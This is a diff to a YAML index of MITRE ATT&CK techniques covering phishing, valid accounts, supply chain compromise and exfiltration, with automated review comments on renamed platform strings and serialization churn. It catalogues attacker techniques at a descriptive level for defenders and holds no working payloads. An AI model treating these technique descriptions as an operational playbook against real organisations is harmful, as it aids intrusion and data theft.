Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59520,10 +60449,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
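Review bot: the platform list for T1566.002 drops `Office 365` and `Google Workspace` and adds `Identity Provider` and `Office Suite` (with the version bump to 2.7). Anything downstream that selects techniques by platform string, in particular per-platform index generation, will silently stop matching this technique unless its mapping learns the new names; please confirm that mapping is updated in the same change and that `Office Suite` and `Identity Provider` are routed to the intended per-platform outputs rather than dropped.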
@@ -59540,7 +60469,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59579,12 +60508,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59646,7 +60574,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -59663,7 +60591,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -59693,7 +60620,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59707,7 +60634,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59770,12 +60696,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59850,7 +60775,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59864,19 +60789,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59902,7 +60826,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59957,7 +60881,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -60020,11 +60943,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -60039,6 +60961,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -60047,18 +60970,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60090,14 +61013,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -60108,6 +61028,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -60116,22 +61041,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -60156,36 +61077,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
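Review bot: the only content change in this T1566 description is the added thread-hijacking clause and its `(Citation: phishing-krebs)`; the rest of the removed and added lines is the scalar style flipping from a double-quoted, line-folded string with literal `\n\n` to a `|-` literal block. The literal block is the better representation (paragraph breaks survive as real blank lines), but the flip shows the emitter's style choice depends on content length, so pin the dump options (width, default style) so that later upstream edits do not toggle it back and bury real changes under a re-flow.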
@@ -60214,9 +61118,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -60234,7 +61138,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -60272,11 +61180,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60293,7 +61200,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -60303,7 +61209,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60312,19 +61218,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60372,11 +61276,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60396,10 +61301,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
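Review bot: T1566.004 loses `SaaS` here as well as `Office 365` and `Google Workspace`, leaving `Identity Provider` as its only non-OS platform, whereas the sibling T1566.002 and the parent T1566 earlier in this diff keep `SaaS`. If that matches the upstream object it is fine, but it deserves a check, since it removes Spearphishing Voice from any SaaS-filtered view while the version only moves 1.0 to 1.1.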
@@ -60432,7 +61335,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -60471,7 +61373,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60486,7 +61388,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -60566,11 +61467,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60626,11 +61526,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -60691,8 +61590,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
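Review bot: T1189 replaces `SaaS` with `Identity Provider` outright (version 1.5 to 1.6) rather than adding to the list as the other platform updates in this diff do. Confirm against upstream before merging, because the substitution drops Drive-by Compromise from SaaS-filtered indexes without any accompanying description change in this hunk to explain the narrowed scope.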
@@ -60720,13 +61619,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60766,8 +61664,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60775,13 +61675,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
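Review bot: T1078.004 drops `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider` (1.7 to 1.8); the same Office 365/Google Workspace to Office Suite replacement appears below for T1567, T1567.004, T1048 and T1537. If any per-platform index is keyed on the retired platform strings, the generator needs an explicit mapping from the old names to the new ones (`Google Workspace` and `Office 365` to `Office Suite`, `Azure AD` to `Identity Provider`) or those indexes will stop selecting these techniques. Please confirm that mapping is part of this PR rather than a follow-up.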
@@ -60812,9 +61712,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Azure Persistence Automation Runbook Created or Modified
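Review bot: the three `-` lines here (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `spec_version`) are mostly not a content change for T1078.004: the first two are re-emitted earlier in the object by the previous hunk, and only `spec_version` actually disappears. The key order of the serialized object has changed between source bundles, which makes every regeneration produce large diffs of moved lines; emitting keys in a fixed order in the index generator (sorted, or a declared order with `modified`, `name` and `description` first) would keep future diffs limited to real changes.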
@@ -60898,7 +61795,7 @@ initial-access:
terraform destroy -auto-approve
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60965,11 +61862,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61021,15 +61917,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -61053,10 +61948,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -61075,13 +61969,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -61120,9 +62013,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -61172,7 +62064,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -61192,7 +62083,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61212,8 +62103,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
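Review bot: T1029 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, whereas techniques on 3.1.0/3.2.0 (T1566.003, T1567 and T1011 around it) keep their `x_mitre_attack_spec_version`. The result is an index where some objects carry the field and some do not; the same happens below for T1011.001, T1048.001, T1048.002, T1052.001, T1030 and T1052. If the source bundle really omits the field on objects last touched under spec 2.1.0, consumers that read it need to treat it as optional; if the generator is dropping it, it should not.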
